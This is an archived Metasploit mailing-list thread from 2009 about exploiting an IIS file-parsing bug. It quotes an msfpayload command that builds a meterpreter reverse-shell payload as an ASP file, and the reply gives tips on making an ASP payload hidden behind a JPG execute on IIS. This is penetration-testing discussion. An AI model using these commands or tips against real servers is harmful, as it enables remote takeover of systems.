Metasploit mailing list archives

Re: Microsoft IIS File Parsing bug

From: τ∂υƒιφ * <tas0584 () gmail com>
Date: Thu, 31 Dec 2009 18:32:32 +0530

Oh! Thanks the ASP extension was not enabled on that system. Point
noted. I also took the 2 kb image this time.

Thanks
TAS!

2009/12/31 HD Moore <hdm () metasploit com>:
On 12/31/2009 2:08 AM, τ∂υƒιφ * wrote:
Hi,

I am trying the "Exploiting Microsoft IIS with Metasploit" I read up
on https://www.blogger.com/comment.g?blogID=25010298&postID=7822358000167530780&pli=1

I have tried the following command

./msfpayload windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=8443
R | ./msfencode -t asp -o /root/evil.asp

This generated the evil.asp. I have also done the cat command and then
verified with the file command. I also started the payload handler and
verified the settings to ensure I am not making any mistakes.

I have two things to ask

1) When I take this evil image and host that on IIS 6.0 I get "Page
not found error" , and when I use the same image on IIS 7.0 it
actually renders the page. Why is this so?

IIS 7.0 may not have the ASP processor loaded, double check the settings
(its not on by default). The "404" doesnt make sense, you should at
least get a 500 if there is an issue.

Something you may want to try is removing the JPG prefix -- some JPG
files cause the ASP processor to bail before it reaches the ASP script
itself (using a small file has a better chance).

-HD